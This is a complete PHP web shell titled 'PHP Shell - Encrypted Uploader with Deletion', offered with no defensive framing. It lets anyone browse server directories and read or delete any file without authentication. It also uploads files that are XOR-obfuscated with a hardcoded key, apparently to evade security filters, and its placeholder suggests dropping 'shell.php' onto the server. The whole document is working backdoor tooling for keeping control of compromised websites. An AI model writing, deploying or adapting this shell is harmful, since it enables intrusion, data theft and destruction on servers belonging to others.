<?php
@ini_set('display_errors', 0);
@error_reporting(0);
// Secret key (must match the one used in JavaScript)
$key = "myXorSecret";
// XOR decryption function
function xor_decrypt($data, $key) {
$out = '';
for ($i = 0, $len = strlen($data); $i < $len; $i++) {
$out .= $data[$i] ^ $key[$i % strlen($key)];
}
return $out;
}
// Handle encrypted file upload
if (isset($_POST['b64data']) && isset($_POST['fn'])) {
$b64 = $_POST['b64data'];
$filename = basename($_POST['fn']);
$raw = base64_decode($b64);
$decrypted = xor_decrypt($raw, $key);
if (file_put_contents($filename, $decrypted)) {
echo "File '$filename' uploaded and decrypted successfully.";
} else {
echo "Failed to write file.";
}
exit;
}
// Handle file deletion
if (isset($_GET['delete'])) {
$deletePath = $_GET['delete'];
if (is_file($deletePath)) {
if (@unlink($deletePath)) {
echo "<p style='color:green;'>File '" . htmlspecialchars($deletePath) . "' deleted successfully.</p>";
} else {
echo "<p style='color:red;'>Failed to delete file '" . htmlspecialchars($deletePath) . "'.</p>";
}
}
}
// Directory listing
$dir = isset($_GET['d']) ? $_GET['d'] : getcwd();
$files = scandir($dir);
function esc($s) {
return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PHP Shell - Encrypted Uploader with Deletion</title>
<style>
body { font-family: monospace; background: #f4f4f4; padding: 20px; }
table { border-collapse: collapse; width: 100%; margin-top: 10px; }
th, td { padding: 6px; border: 1px solid #ccc; }
th { background: #eee; }
input[type="text"] { width: 300px; }
a.button { padding: 2px 6px; background: #ccc; text-decoration: none; border-radius: 4px; margin-right: 5px; }
a.button:hover { background: #999; color: white; }
</style>
</head>
<body>
<h2>Directory: <?= esc($dir) ?></h2>
<p>
<a href="?d=<?= esc(dirname($dir)) ?>">Go to Parent Directory</a>
</p>
<table>
<thead>
<tr><th>Name</th><th>Type</th><th>Action</th></tr>
</thead>
<tbody>
<?php foreach ($files as $f):
if ($f === '.') continue;
$path = realpath($dir . DIRECTORY_SEPARATOR . $f);
$type = is_dir($path) ? 'DIR' : 'FILE';
?>
<tr>
<td><?= esc($f) ?></td>
<td><?= $type ?></td>
<td>
<?php if ($type === 'DIR'): ?>
<a class="button" href="?d=<?= esc($path) ?>">Open</a>
<?php else: ?>
<a class="button" href="?view=<?= esc($path) ?>">View</a>
<a class="button" href="?d=<?= esc($dir) ?>&delete=<?= esc($path) ?>" onclick="return confirm('Delete this file?')">Delete</a>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php
// File viewer
if (isset($_GET['view']) && is_file($_GET['view'])):
$path = $_GET['view'];
$content = @file_get_contents($path);
?>
<h3>File: <?= esc($path) ?></h3>
<pre><?= esc($content) ?></pre>
<?php endif; ?>
<h3>Upload Encrypted File</h3>
<input type="file" id="file"><br><br>
<input type="text" id="filename" placeholder="Remote filename (e.g. shell.php)"><br><br>
<button onclick="upload()">Upload</button>
<pre id="log" style="background:#eee; padding:10px; margin-top:10px;"></pre>
<script>
const key = "myXorSecret";
function xorEncryptBuffer(buffer, key) {
const out = new Uint8Array(buffer.byteLength);
const keyBytes = new TextEncoder().encode(key);
for (let i = 0; i < buffer.byteLength; i++) {
out[i] = buffer[i] ^ keyBytes[i % keyBytes.length];
}
return out;
}
function upload() {
const fileInput = document.getElementById("file");
const filenameInput = document.getElementById("filename");
const file = fileInput.files[0];
const fn = filenameInput.value.trim();
if (!file || !fn) return alert("Please select a file and enter a filename.");
const reader = new FileReader();
reader.onload = function(e) {
const buffer = new Uint8Array(e.target.result);
const encrypted = xorEncryptBuffer(buffer, key);
const b64 = btoa(String.fromCharCode(...encrypted));
fetch("", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: "b64data=" + encodeURIComponent(b64) + "&fn=" + encodeURIComponent(fn)
}).then(res => res.text()).then(t => {
document.getElementById("log").innerText = t;
});
};
reader.readAsArrayBuffer(file);
}
</script>
</body>
</html>